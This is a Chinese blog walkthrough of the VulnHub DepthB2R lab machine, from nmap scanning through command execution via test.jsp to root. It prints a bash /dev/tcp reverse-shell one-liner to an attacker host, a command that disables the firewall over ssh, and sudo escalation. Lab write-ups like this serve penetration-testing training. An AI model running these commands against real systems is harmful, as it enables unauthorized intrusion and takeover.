DepthB2R靶场实战【超详细】

最新推荐文章于 2024-10-14 00:06:00 发布
最新推荐文章于 2024-10-14 00:06:00 发布
阅读量379 收藏 3
点赞数 14
分类专栏: vulnhub靶机 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68615160/article/details/140934358
版权

下载地址:https://download.vulnhub.com/depth/DepthB2R.ova

一、主机探测与端口扫描

nmap 192.168.121.0/24

 发现开启了8080端口

我们对该端口进行扫描

nmap 192.168.121.187 -p- -A -Pn -sV

 访问其8080web服务

二、get shell

目录扫描

dirsearch -u http://192.168.121.187:8080

 有一个test.jsp,我们访问它

 提示我们可以输入命令

输入ls -la /home,发现root 和bill用户

ls -la /home

我们尝试反弹shell

bash -i >& /dev/tcp/192.168.121.171/4444 0>&1

反弹未能成功,我们看一下进程

ps aux

 发现ssh服务开放,之前端口扫描没扫到,可能是开了防火墙

查看/etc下,防火墙是存在的

ls -la /etc

 

我们尝试关闭防火墙

ssh bill@localhost sudo ufw disable

再次尝试反弹

ssh bill@localhost bash -i >& /dev/tcp/192.168.121.171/4444 0>&1

kali开启监听,成功反弹shell

 三、提权

sudo -l

sudo -l查看具有sudo权限的命令程序

显示所有用户,直接sudo su

sudo su

成功提权

橙子iiii
关注
专栏目录
有效获取移动光猫(H3-s2)管信息
02-18
本文将深入探讨如何有效获取移动光猫H3-s2的级管理员(管)信息,这对于设备的故障排查、配置优化以及安全维护具有重要意义。 首先,我们要了解移动光猫H3-s2的基本信息。H3-s2是一款由华为制造的光网络终端...
AXA2R allegro封装
05-06
1. AXA2R.dra:这是AXA2R73061封装的主设计文件,包含了整个封装的详细信息,包括各个焊盘的位置、大小、形状以及电气连接。 2. ovalx0_5y1_6.dra和ovalx0_6y1_7.dra:这些文件可能表示接插件的不同部分,比如焊盘或...
vulnhub系列:DepthB2R
jq_j37的博客
08-03 324
vulnhub系列:DepthB2R靶机,打靶文章
DepthB2R【附代码】(权限提升)
weixin_52487093的博客
08-05 314
BREACH: 2.1【附代码】(权限提升)
Vulnhub靶机 Depth(渗透测试)
2301_78721909的博客
07-29 377
Vulnhub靶机 Depth(from wuhu)
VulnHub DepthB2R 靶机渗透
Shadow的博客
04-08 405
DepthB2R 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-08 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 主机ip为172.16.1.22 nmap -p- -A -T5 172.16.1.22 只开放了8080端口,我们看看是什么 二、web渗透 没什么发现,试试nikto扫描下 ni
【vulnhub】DepthB2R 打靶渗透
weixin_62162207的博客
08-07 243
DepthB2R 打靶渗透
DepthB2R靶机打靶记录
qq_64703089的博客
10-08 490
DepthB2R靶机
basic_pentesting_1靶场实战[详细]
weixin_68615160的博客
08-05 435
无可用信息,我们想起来之前扫描端口信息的时候,开启的ftp服务版本貌似有漏洞。ip地址为192.168.121.186,开启了21、22、80端口。攻击成功,成功拿到root权限,省了提权这一步。再次查看配置信息,发现还需要设置监听地址。设置RHOSTS为靶机ip地址。使用msfconsole查看。访问一下80web服务看看。使用第五个,1.3.3c。我们设置为kali的ip。提示没有添加任何内容。网卡模式设置为nat。
jixiebi2R.zip_2R机械臂_Planar Robot_动力方程_平面机械臂_机械臂matlab
07-14
平面2R机械臂matlab仿真代码,动力学方程!
YAESU VX-2R/八重州 VX-2R对讲机维修手册原理图
07-19
YAESU VX-2R/八重州 VX-2R对讲机维修手册原理图 世界上最小的带宽带接收的双频 HT 世界上最小的双频 HT 输出功率高达 1.5 瓦*,是您通过 VHF、UHF、短波广播、航海和飞机频段或 WIRES 互联网链接通向世界的高科技...
固态硬盘开卡工具,SM2258XT,H27Q1T8PQA2R,固态硬盘量产工具
05-02
M2258XT主控开卡量产修复工具,SM2258XT,HY3D-V4,PKGR0205A_FWR0124A0,理论海力士三代TLC 3D V4通用,亲测H27Q1T8PQA2R,成功,固态硬盘为七彩虹PC COOLER200,120G固态硬盘,量产成功。
[Linux网络编程]深入了解TCP通信API,看看底层做了啥(看了这篇文章,你也算是读了Linux源码的高手!)
最新发布
m0_75062065的博客
10-14 276
在学了Linux网络编程时,有几个问题一直困扰着我listen的第二个参数backlog到底是什么为什么网络套接字也是文件描述符为什么要bind(),他起了什么作用于是就决心梳理一下整套通信的过程,建立完整的通信框架,便有了这篇文章tips:以下内容均在Linux2.6内核讨论,不同内核的实现方式大致相同,但是某些细节略有不同!!
408 14——42题
2402_85676269的博客
10-11 1024
/ 链路信息节点结构体// 路由器ID// 路由器IP} LinkNode;// 网络信息节点结构体// 网络前缀// 子网掩码} NetNode;// 弧节点结构体int Flag;// 标志位:1表示Link信息,2表示Net信息union {// 链路信息// 网络信息// 链路的代价// 指向下一个弧节点的指针} ArcNode;// 表头节点结构体// 路由器ID// 指向弧节点的指针// 指向下一个表头节点的指针} HNode;LinkNode和。
WireShark过滤器
ngczx的博客
10-11 625
Wireshark的过滤器规则可以分为**捕获过滤器**和**显示过滤器**,这两种过滤器有不同的编写规则
Netty 相比原生IO模型的优势
lssffy的博客
10-09 625
Java提供了多种I/O模型,每种模型都有其适用的场景和特点,随着网络应用需求的变化,I/O模型也在不断发展。阻塞I/O(BIO,Blocking I/O)传统的I/O模型,使用简单,但每次I/O操作都会阻塞线程。每个请求需要独立的线程来处理,这在并发请求较少时问题不大,但在高并发情况下,线程资源将成为瓶颈。非阻塞I/O(NIO,Non-Blocking I/O)引入了多路复用技术,一个线程可以处理多个连接,避免了BIO中每个连接占用一个线程的问题。通过Selector。
VX-2R紧凑双频接收器技术手册:详解与服务指南
VX-2R技术图纸是一份详细的说明书,针对Vertex Standard公司生产的VHF/UHF Ultra-Compact Dual-Band Transceiver(紧凑双频收发器)VX-2R。这份技术补充文档提供了全面的技术支持,旨在帮助专业维修人员进行服务和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值